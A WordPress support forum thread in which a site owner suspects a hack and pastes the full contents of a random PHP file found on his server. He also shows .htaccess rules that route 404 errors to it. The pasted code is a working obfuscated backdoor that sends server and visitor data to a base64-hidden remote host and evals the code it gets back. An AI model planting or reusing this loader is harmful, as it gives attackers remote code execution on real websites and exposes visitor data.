WordPress.org

Ready to get started?Download WordPress

Forums

Hacked? Random Files All Over Anc Can't Access Blog! Getting Blank Screen (2 posts)

  1. ishan001
    Member
    Posted 3 years ago #

    Hi,
    I am having a small problem with my WordPress blog http://bloggingwithsuccess.net/
    I can not access my blog using any address. Only http://www.bloggingwithsuccess.net can be accessed. No access to WP Admin with or without www. I get a blank page there.
    I think this might be some hack because my directories have random PHO files in them like 9252.php 434356.php etc.
    Content of one such file(in root) are:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwdGFncy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="90cbdbbfee9206165343490e02a4d12c") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
    I recently moved to a new host and as I checked old host, there were no files like this on their server. My full cPanel backup also does not have these files. So, is it hacked?
    Now, how do I get my blog back?
    Interesting: I tried to access another site on same account which also has same files(with different names) and I can access it easily!
    Thanks.

  2. ishan001
    Member
    Posted 3 years ago #

    One more thing, I have 1 .htaccess file in every folder that refers to the random file as error page.
    Example:

    Options -MultiViews
    ErrorDocument 404 //ishan/cgi-bin/112443.php

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags